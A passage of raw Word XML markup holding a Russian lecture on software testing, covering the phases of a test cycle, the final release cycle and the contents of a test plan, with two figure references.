          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ результатов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t>После анализа результатов возможно повторение процесса тестирования, начиная с п.п. 3, 2 или даже 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="sect4"/>
      <w:bookmarkStart w:id="161" w:name="keyword-context.1"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyworddef"/>
          <w:b/>
        </w:rPr>
        <w:t>Тестовый цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – это цикл исполнения тестов, включающий фазы 4 и 5 тестового процесса. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>Тестовый цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> заключается в прогоне разработанных тестов на некотором однозначно определяемом срезе системы (состоянии кода разрабатываемой системы). Обычно такой срез системы называют </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>Тестовый цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> включает следующую последовательность действий:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Проверка готовности системы и тестов к проведению </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>тестового цикла</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> включающая:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверку того, что все тесты, запланированные для исполнения на данном цикле, разработаны и помещены в систему версионного контроля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверку того, что все подсистемы, запланированные для тестирования на данном цикле, разработаны и помещены в систему версионного контроля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверку того, что разработана и задокументирована процедура определения и создания среза системы, или build.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверки некоторых дополнительных критериев.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подготовка тестовой машины</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в соответствии с требованиями, определенными на этапе планирования (например, полная очистка и переустановка системного программного обеспечения). Конфигурация тестовой машины, так же, как и срез системы, должны быть однозначно воспроизводимыми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Воспроизведение среза системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прогон тестов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в соответствии с задокументированными процедурами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сохранение тестовых протоколов (test log)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Test log может содержать вывод системы в STDOUT, список результатов сравнения полученных при исполнении данных с эталонными или любые другие выходные данные тестов, с помощью которых можно проверить правильность работы системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ протоколов тестирования</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и принятие решения о том прошел или не прошел каждый из тестов (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pass/Fail</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ и документирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> результатов цикла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Последний перед выпуском продукта </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>тестовый цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> не должен включать изменений кода build или кода продукта тестируемой системы. Этот цикл называется « финальным «. Таким образом обеспечивается ситуация, когда финальный цикл полностью повторяем, а выпускаемый продукт полностью совпадает с продуктом, который прошел тестирование. Финальный цикл необходим для гарантии достоверности результатов тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="sect5"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание Планирование тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="sect6"/>
      <w:bookmarkStart w:id="164" w:name="keyword-context.2"/>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyworddef"/>
          <w:b/>
        </w:rPr>
        <w:t>Тестовый план</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – это документ, или набор документов, содержащий следующую информацию:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестовые ресурсы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень функций и подсистем, подлежащих тестированию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
        </w:rPr>
        <w:t>Тестовую стратегию</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>, включающую:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ функций и подсистем с целью определения наиболее слабых мест, то есть областей функциональности тестируемой системы, где появление дефектов наиболее вероятно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение стратегии выбора входных данных для тестирования. Так как множество возможных входных данных программного продукта, как правило, практически бесконечно, выбор конечного подмножества, достаточного для проведения исчерпывающего тестирования, является сложной задачей. Для ее решения могут быть применены такие методы, как покрытие классов входных и выходных данных, анализ крайних значений, покрытие модели использования, анализ временной линии и тому подобные. Выбранную стратегию необходимо обосновать и задокументировать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение потребности в автоматизированной системе тестирования и дизайн такой системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Расписание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тестовых циклов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (пример приведен на </w:t>
      </w:r>
      <w:hyperlink r:id="rId380" w:anchor="image.9.1" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Рис.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Фиксацию тестовой конфигурации: состава и конкретных параметров аппаратуры и программного окружения (пример приведен на </w:t>
      </w:r>
      <w:hyperlink r:id="rId381" w:anchor="image.9.2" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Рис.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Определение списка тестовых метрик, которые на </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тестовом цикле</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо собрать и проанализировать. Например, метрик, оценивающих степень покрытия тестами набора требований, степень покрытия кода тестируемой системы, количество и уровень серьезности дефектов, объем тестового кода и другие характеристики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="image.9.1"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2676205" cy="1641600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="566" name="Рисунок 566" descr="http://www.intuit.ru/department/se/testing/9/9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www.intuit.ru/department/se/testing/9/9_1.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId382" r:link="rId383" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2677321" cy="1642284"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Пример расписания двух последних тестовых циклов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="image.9.2"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2630550" cy="2049434"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="567" name="Рисунок 567" descr="http://www.intuit.ru/department/se/testing/9/9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www.intuit.ru/department/se/testing/9/9_2.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId384" r:link="rId385" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2630773" cy="2049608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рис. 2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Пример детализации условий проведения системных циклов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="sect7"/>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
